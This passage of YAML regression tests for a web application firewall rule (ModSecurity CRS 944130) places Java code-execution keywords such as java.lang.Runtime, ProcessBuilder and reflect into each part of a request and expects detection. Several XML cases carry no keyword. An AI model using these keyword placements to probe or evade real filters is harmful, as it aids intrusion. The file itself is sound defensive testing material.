              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.Number\": \"test\"}"
          output:
            log_contains: "id \"944130\""
  # The list item opened below continues after the last line of this block.
  -
test_title: 944130-297 desc: "Argument test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-298 desc: "Argument name includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Object=test" output: log_contains: "id \"944130\"" - test_title: 944130-299 desc: "Cookie test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Object method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-300 desc: "Cookie name includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Object=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-301 desc: "Request header test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Object method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-302 desc: "XML attribute value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-303 desc: "XML element value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-304 desc: "Nested XML element value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-305 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-306 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Object\"}" output: log_contains: "id \"944130\"" - test_title: 944130-307 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - stage: input: dest_addr: 
"127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Object\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-308 desc: "Argument test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-309 desc: "Argument name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Process=test" output: log_contains: "id \"944130\"" - test_title: 944130-310 desc: "Cookie test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Process method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-311 desc: "Cookie name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Process=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-312 desc: "Request header test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Process method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-313 desc: "XML attribute value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 
944130-314 desc: "XML element value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-315 desc: "Nested XML element value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-316 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-317 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Process\"}" output: log_contains: "id \"944130\"" - test_title: 944130-318 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Process\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-319 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-320 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder=test" output: log_contains: "id \"944130\"" - test_title: 944130-321 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.ProcessBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-322 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.ProcessBuilder=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-323 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.ProcessBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id 
\"944130\"" - test_title: 944130-324 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-325 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-326 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-327 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-328 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.ProcessBuilder\"}" output: log_contains: "id \"944130\"" - test_title: 944130-329 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.ProcessBuilder\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-330 desc: "Argument test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-331 desc: "Argument name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect=test" output: log_contains: "id \"944130\"" - test_title: 944130-332 desc: "Cookie test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.reflect method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-333 desc: "Cookie name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.reflect=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-334 desc: "Request header 
test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.reflect method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-335 desc: "XML attribute value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-336 desc: "XML element value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-337 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-338 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-339 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.reflect\"}" output: log_contains: "id \"944130\"" - test_title: 944130-340 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.reflect\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-341 desc: "Argument test includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Runtime" output: log_contains: "id \"944130\"" - test_title: 944130-342 desc: "Argument name includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Runtime=test" output: log_contains: "id \"944130\"" - test_title: 944130-343 desc: "Cookie test includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Runtime method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-344 desc: "Cookie name includes keyword java.lang.Runtime" stages: - stage: 
input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Runtime=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\""
# NOTE(review): the line above is the tail of test 944130-344, which starts
# on the preceding line; it is left exactly as found.
#
# Regression fixtures for rule id 944130 (Java class / package-name keywords).
# Every stage below sends one HTTP/1.0 POST to 127.0.0.1:80 and expects the
# log to contain `id "944130"`, so all of these are positive (must-detect)
# cases. No must-not-match (`no_log_contains`) case appears in this excerpt.
#
# Each keyword is placed in the same eleven positions: form argument value and
# name, cookie value and name, a custom request header named "test", three XML
# variants, a text/plain body, and a JSON value and key. Presumably this
# mirrors the request parts the rule inspects; confirm against the rule
# definition.
#
# NOTE(review): the three XML cases in every group carry no XML markup as
